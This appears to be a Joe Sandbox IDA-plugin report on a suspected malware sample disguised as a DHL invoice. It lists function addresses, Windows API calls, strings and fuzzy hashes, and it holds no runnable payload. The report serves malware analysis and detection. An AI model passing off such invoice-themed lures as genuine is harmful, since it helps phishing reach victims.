Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 5ff1c83aa0963029c2266391b6556a35f8a62dd241e8c66bd42430d1a9326bf5
Instruction ID: 0728479a3b8ee182e928d7310ced60abdb22f450be0063cda04d8313c87d6beb
Opcode Fuzzy Hash: 5ff1c83aa0963029c2266391b6556a35f8a62dd241e8c66bd42430d1a9326bf5
Instruction Fuzzy Hash: 0E317031210205AFDF209E78DC45FEB7BA9EB48338F21472AF975922D0D778AC519754

Function 00466E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00466EED
VariantCopyInd.OLEAUT32(?,?), ref: 00466F08
VariantClear.OLEAUT32(?), ref: 00466F12

Strings

*jF, xrefs: 00466E8B, 00466E90, 00466EF8

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *jF
API String ID: 2173805711-3392568748
Opcode ID: cd5f1077f9571672e8d588c471ce99e63cf3dc401fc2dbd5dd48f9f92d3b6613
Instruction ID: 6de2da9f0326b4a2041103a222ed4b69bcdc90237033d5b8759724ce627c219a
Opcode Fuzzy Hash: cd5f1077f9571672e8d588c471ce99e63cf3dc401fc2dbd5dd48f9f92d3b6613
Instruction Fuzzy Hash: 6F31B371704205DFCB08AF65E8909BE3775EF84308B1104AEF8065B2A1D7389D12DBDE

Function 0048304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0048335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00483077,?,?), ref: 00483378

inet_addr.WSOCK32(?), ref: 0048307A
_wcslen.LIBCMT ref: 0048309B
htons.WSOCK32(00000000), ref: 00483106

Strings

255.255.255.255, xrefs: 00483095, 0048309A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 2c70b04d5355e2bc115ce831f308f78862127d5d93b64bd96f75ea30fc539669
Instruction ID: 285a93b77c3d3ed3e9b560691309ecfd3242912dfdeec0dd63436009f81c7906
Opcode Fuzzy Hash: 2c70b04d5355e2bc115ce831f308f78862127d5d93b64bd96f75ea30fc539669
Instruction Fuzzy Hash: 9731F535600201DFCB10EF28C485EAE77E0EF15B19F24886AE8158B392C779EE42C765

Function 00494653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00494705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00494713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0049471A

Strings

msctls_updown32, xrefs: 00494684

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 23c8b7b152fe75fdfc6467790956a04e644075744727a90ad01813c248414afc
Instruction ID: cb52790c497286f8ce5b7de91d627fe49a0464525d65d285891c7fb7f9937efc
Opcode Fuzzy Hash: 23c8b7b152fe75fdfc6467790956a04e644075744727a90ad01813c248414afc
Instruction Fuzzy Hash: 8A2165B5600208AFDB10DF55DCD1D773BADEB9A358B14006AFA0097351D774EC12CA64

Function 004695AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0046961D

Strings

#OnAutoItStartRegister, xrefs: 004695F3
#requireadmin, xrefs: 004695D9
#notrayicon, xrefs: 004695B7

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 7a96940abab752c814026ea6ab9c19e312172e8975e6ac360b44ee6ae35ca431
Instruction ID: 92db3e0312e131ddcc12d84735b0dd0389c407085b613a7ecae2ca61b574a9db
Opcode Fuzzy Hash: 7a96940abab752c814026ea6ab9c19e312172e8975e6ac360b44ee6ae35ca431
Instruction Fuzzy Hash: D221F57220461066C721AA25D802FAB739C9F61314F54442BF94AE6181FBBDAD46C29F

Function 004937B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00493840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00493850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00493876

Strings

Listbox, xrefs: 0049380F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: cfacaf523655fb328c9910c8f2b0a9c2e74fedc94336a99e1fd67e23fffc4f95
Instruction ID: 8a9d39a12ed8b5cfa55d7752aa31a57177e4c8dd589084ff0fe160f21cf9084d
Opcode Fuzzy Hash: cfacaf523655fb328c9910c8f2b0a9c2e74fedc94336a99e1fd67e23fffc4f95
Instruction Fuzzy Hash: D821B072600118BBEF21DF95CC85FBB3BAAEF8A754F108136F9059B290C675DC5287A4

Function 004749F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00474A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00474A5C
SetErrorMode.KERNEL32(00000000,?,?,0049CC08), ref: 00474AD0

Strings

%lu, xrefs: 00474A6F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 73af92db0b0559782d0fd6770a86a142ab82f764216e87a1e769cef45a771675
Instruction ID: df530c5760f7171ec6f3d07ee33d6c9139ef3a859cd9b124a1ee9dc24f4d8152
Opcode Fuzzy Hash: 73af92db0b0559782d0fd6770a86a142ab82f764216e87a1e769cef45a771675
Instruction Fuzzy Hash: 4F316575A00109AFDB10DF64C885EAA7BF8EF44308F1480AAF909EB352D775ED45CB69

Function 004941EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0049424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00494264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00494271

Strings

msctls_trackbar32, xrefs: 00494226

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 78864fb44d737ef458aedb5c933010a09097bc0162def24c59e60035a9a0217b
Instruction ID: 9d8991d74e836ef3985734061df2e246540610c0161d576e753d19c50584e58e
Opcode Fuzzy Hash: 78864fb44d737ef458aedb5c933010a09097bc0162def24c59e60035a9a0217b
Instruction Fuzzy Hash: 0611E7312402087EEF205F29CC06FAB3BACEFD5764F11053AFA55E2190D275DC529B28

Function 00462F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00406B57: _wcslen.LIBCMT ref: 00406B6A

Part of subcall function 00462DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00462DC5
Part of subcall function 00462DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00462DD6
Part of subcall function 00462DA7: GetCurrentThreadId.KERNEL32 ref: 00462DDD
Part of subcall function 00462DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00462DE4

GetFocus.USER32 ref: 00462F78

Part of subcall function 00462DEE: GetParent.USER32(00000000), ref: 00462DF9

GetClassNameW.USER32(?,?,00000100), ref: 00462FC3
EnumChildWindows.USER32(?,0046303B), ref: 00462FEB

Strings

%s%d, xrefs: 00462FFF

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 0c9f119176b258418091c11ee237925fe53c672ad50993792245eb1f5b0aa3bf
Instruction ID: 82fd7fc501bf372943fdddc3cc937b3277276978e4ba8ad9e090773954ace8d1
Opcode Fuzzy Hash: 0c9f119176b258418091c11ee237925fe53c672ad50993792245eb1f5b0aa3bf
Instruction Fuzzy Hash: D011D8B520020577CF007F61CCC5FED376A9F94308F14407BB9099B196EE7859498B65

Function 00495882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004958C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004958EE
DrawMenuBar.USER32(?), ref: 004958FD

Strings

0, xrefs: 0049588F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: cf91324502480a384da169d06e6fe36429412dfe7c5f6ccbaa3cfa1c8aa34896
Instruction ID: 83e1dcf050c05643123abd945a2fa757dd178eb3db84fdade57d0b8e2d2bd318
Opcode Fuzzy Hash: cf91324502480a384da169d06e6fe36429412dfe7c5f6ccbaa3cfa1c8aa34896
Instruction Fuzzy Hash: 07013971500218EFDF229F21D844BAABBB4BB45760F2080AAE849D6251DB348A859F29

Function 0045D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0045D3BF
FreeLibrary.KERNEL32 ref: 0045D3E5

Strings

X64, xrefs: 0045D2A8
GetSystemWow64DirectoryW, xrefs: 0045D3B9

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: b6adb67ee163d7f37e6dd4a9f7452c879603423033646fc8a4f5558c059358cf
Instruction ID: 43432f940e0e203114d8ebc562b75f107543d3eb8a764d1fb67787ffffe4334a
Opcode Fuzzy Hash: b6adb67ee163d7f37e6dd4a9f7452c879603423033646fc8a4f5558c059358cf
Instruction Fuzzy Hash: CCF05531C06A209BD73143109C94AAA3710AF10703F9481BBFC02E221BDB2CCD8D8E8F

Function 0046007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecade4058146d6d35f781e3e606741af9ad73b5b9492593b64386777867617e7
Instruction ID: 94c9c41509d1e4c5a8e08a38e1b7b6842f61b44e81293f867b60021e2a4278a4
Opcode Fuzzy Hash: ecade4058146d6d35f781e3e606741af9ad73b5b9492593b64386777867617e7
Instruction Fuzzy Hash: 0FC15B75A00206EFDB14CFA4C894AAFB7B5FF48304F10859AE905EB251E735ED82CB95

Function 0048342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00483459
CoUninitialize.OLE32 ref: 00483463
VariantInit.OLEAUT32(?), ref: 0048346E
VariantClear.OLEAUT32(?), ref: 0048371B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: f60410ebaf799f575a0272eb71a9a30e4949b2f0c76ac615891a0c8e177dbc7e
Instruction ID: 570cbaaab2342c233ebb97c5c5b9c444c4d80ccb1daae5e6e76c48cb97dd4743
Opcode Fuzzy Hash: f60410ebaf799f575a0272eb71a9a30e4949b2f0c76ac615891a0c8e177dbc7e
Instruction Fuzzy Hash: 17A16F75604200AFC710EF29C485A5EB7E5FF88719F04885EF949AB3A1DB38ED41CB5A

Function 00460436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0049FC08,?), ref: 004605F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0049FC08,?), ref: 00460608
CLSIDFromProgID.OLE32(?,?,00000000,0049CC40,000000FF,?,00000000,00000800,00000000,?,0049FC08,?), ref: 0046062D
_memcmp.LIBVCRUNTIME ref: 0046064E

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: cbd5f666aa106cea6d9603c1148a75860384156e2eb44ce4e541e376e2cfc3ea
Instruction ID: f9a59b8346efa6e10ba7795abcb0c6171adc659268d755ba3f0ce48382549377
Opcode Fuzzy Hash: cbd5f666aa106cea6d9603c1148a75860384156e2eb44ce4e541e376e2cfc3ea
Instruction Fuzzy Hash: E4815971A00209EFCB04DF94C984EEFB7B9FF89315F204169E506AB250DB75AE06CB65

Function 00441391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004414C0

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6dd62e419302532069c506016c626128008f7196fd3326eb196f11de1745a17c
Instruction ID: 02eb6fbf82337425a1bdca52d7c6f1392c4afccab4a99a9cb4b0804c59c437be
Opcode Fuzzy Hash: 6dd62e419302532069c506016c626128008f7196fd3326eb196f11de1745a17c
Instruction Fuzzy Hash: E9415031A00510ABFB257BBA9C466AF3AB4EF46374F14027BF418D22E1E67C4881567E

Function 00496278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00C9FC08,?), ref: 004962E2
ScreenToClient.USER32(?,?), ref: 00496315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00496382

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 8ff6126bd4dbe2165df318716aaafbe08c161f45f1ee59df23545c50577d147b
Instruction ID: acd17833047793f661cc75963ab42a23303c6dd3afac53a11c8f06da8abf5692
Opcode Fuzzy Hash: 8ff6126bd4dbe2165df318716aaafbe08c161f45f1ee59df23545c50577d147b
Instruction Fuzzy Hash: 05512974A00209AFDF20DF68D890AAE7BB5EF55364F11817AF8159B3A0D734ED81CB54

Function 00481AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00481AFD
WSAGetLastError.WSOCK32 ref: 00481B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00481B8A
WSAGetLastError.WSOCK32 ref: 00481B94

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 357181b83124c342bd93e3bae6cd8245922a1b3b9e689de9a9f956bcb3892dc8
Instruction ID: 27d5f7e5e0494daf054d57574bee0fb3d261d84db41f2ed9cb4e1c6f7c1bcb7e
Opcode Fuzzy Hash: 357181b83124c342bd93e3bae6cd8245922a1b3b9e689de9a9f956bcb3892dc8
Instruction Fuzzy Hash: 93410734600200AFD720AF25C886F6A77E5AB4471CF5484AEF5169F3D2D779ED82CB94

Function 0043B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92300467f74a8ce655cf74ca6bdaee5cc0430d91273f78a41d58d6439cffd922
Instruction ID: e7627aa7255900311f934eb1525651e43d661f0787cc4fdac451f9efa051cafa
Opcode Fuzzy Hash: 92300467f74a8ce655cf74ca6bdaee5cc0430d91273f78a41d58d6439cffd922
Instruction Fuzzy Hash: 82413875A00304BFE7249F39CC41B6ABBA9EB9C714F20952FF201DB291D379990187D8

Function 004756D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

